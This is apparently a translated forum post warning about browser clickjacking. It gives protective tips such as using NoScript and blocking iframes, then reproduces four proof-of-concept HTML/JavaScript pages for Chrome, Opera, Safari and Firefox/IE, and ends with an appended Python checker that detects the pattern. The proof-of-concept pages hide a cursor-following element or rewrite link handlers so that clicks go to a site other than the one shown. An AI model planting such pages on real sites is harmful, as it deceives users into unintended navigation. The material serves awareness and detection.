Greetings, friends.
The people who found this vulnerability described it with the phrase "Not bad, very bad!!!".
This vulnerability works in every browser and does its job without the user's knowledge, so the danger is obvious.
This is a vulnerability that will drive internet users into paranoia with every mouse click, and it is also a major factor in your critical information being altered or stolen.
So how do we protect ourselves?
For now, only the Firefox people have done any work in this direction.
They released the "NoScript" plug-in.
Even though it does not help much, it will tide you over until a patch or a new, secure browser comes out.
Besides this, the precautions you can take are:
~ Download the Firefox NoScript add-on right away and start using it.
~ Do not click on every link.
~ Too much curiosity is not good; do not open everything just because you are curious.
~ Do not click on links to sites you do not know.
~ Do not accept e-mails or contact-list invitations from people you do not trust.
~ Be paranoid about everything, so that you can notice the danger.
Firefox NoScript add-on:
Download NoScript for Firefox: http://noscript.net/getit/
* After installing NoScript in Firefox: Tools->Add-ons->Noscript->Options->Plugins->Forbid <IFRAME>
* ClickJacking exploits:
----------------
#############################################################
# Application Name : Google Chrome Web Browser
# Vulnerable Type : clickjacking
# Author : x0x
#############################################################
< ------------------- header data end of ------------------- >
<html>
<style type="text/css">
<!--
.style1 {
font-size: 50px;
font-weight: bold;
}
.style2 {
color: #FF0000;
font-weight: bold;
font-size: 24px;
}
-->
</style>
<bOdy>
<span class="style2">x0x</span>
<div class="style1" id="open"
style="position:absolute; width:8px; height:7px; background:#FFFFFF; border:1px; left: 19px; top: 115px;"
onmouseover="document.location='http://www.Cyber-warrior.org/x0x';">This</div>
<p><strong>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
</strong><a href="http://www.haber7.com/haber.asp?id=11111" onClick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber icin tiklayiniz</font></a></p>
<p><br>
</p>
</html>
<-------------------------------------------------------------->
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###############################################################
# Application Name : Opera Web Browser
# Author : x0x
# Vulnerable Type : ClickJacking
#############################################################
< ------------------- header data end of ------------------- >
<html>
<title>ClickJacking</title>
<bOdy bgcolor=black>
<a onMouseUp=window.open("http://www.google.com/")
href="http://www.cyber-warrior.org/x0x">
<font color=green>Test This Vulnerable : ) </font></a></bOdy>
</html>
<-------------------------------------------------------------->
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#############################################################
# Application Name : Safari Web Browser
# Vulnerable Type : clickjacking
# Author : x0x
#############################################################
< ------------------- header data end of ------------------- >
<html>
<bOdy>
<div id="open"
onmouseover="document.location='http://www.Cyber-warrior.org/x0x';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.haber7.com/haber.asp?id=11111" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">haber için tiklayiniz</font></a>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#############################################################
# Application Name : FireFox & Internet Explorer
# Vulnerable Type : clickjacking
# Author : UzmiX ~ Orduyu Lojistik
#############################################################
< ------------------- header data end of ------------------- >
<html>
<bOdy>
<div id="open"
onmouseover="document.location='http://www.uzmix.net/';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com/" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com/</font></a>
</html>
----
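A static check for the markup pattern the pages above share, added here as an example and not part of the original post: it flags a cursor-sized, absolutely positioned element whose inline handler navigates, and a link that has an href but also a handler that navigates elsewhere. The 16px cut-off, the finding names and the sample hosts are assumptions made for this example.

```python
import re
from html.parser import HTMLParser

# Inline handler bodies that navigate or open a window.
NAVIGATES = re.compile(r"(?:document|window)\.location|location\.href|window\.open", re.I)
ABSOLUTE = re.compile(r"position\s*:\s*absolute", re.I)
MAX_PX = 16  # assumed cut-off for a "cursor-sized" element

def px(style, prop):
    """Return an inline style's pixel value for prop, or None."""
    m = re.search(rf"(?<![-\w]){prop}\s*:\s*(\d+)px", style, re.I)
    return int(m.group(1)) if m else None

class HandlerAudit(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # names arrive lower-cased
        nav = sorted(k for k, v in a.items() if k.startswith("on") and NAVIGATES.search(v))
        if not nav:
            return
        style = a.get("style", "")
        w, h = px(style, "width"), px(style, "height")
        tiny = w is not None and h is not None and max(w, h) <= MAX_PX
        if tiny and ABSOLUTE.search(style):
            # A movable, cursor-sized element that redirects on hover or click.
            self.findings.append((tag, "tiny-positioned-navigating-element", nav))
        elif tag == "a" and a.get("href"):
            # The link has an href, but a handler also navigates somewhere.
            self.findings.append((tag, "link-with-navigating-handler", nav))

def audit(html):
    parser = HandlerAudit()
    parser.feed(html)
    parser.close()
    return parser.findings

# Constructed samples (hypothetical hosts), shaped like the pages above.
SAMPLE_OVERLAY = ('<div id="open" onmouseover="document.location=\'http://redirect.example/\';" '
                  'style="position:absolute; width:8px; height:7px; background:#FFFFFF"></div>')
SAMPLE_LINK = '<a onmouseup="window.open(\'http://other.example/\')" href="http://shown.example/">news</a>'
SAMPLE_BENIGN = '<a href="http://shown.example/" onclick="track(event)">news</a>'

if __name__ == "__main__":
    for sample in (SAMPLE_OVERLAY, SAMPLE_LINK, SAMPLE_BENIGN):
        print(audit(sample))
```

The check only reads inline attributes, so handlers attached from script or styles set in a stylesheet are outside what it sees.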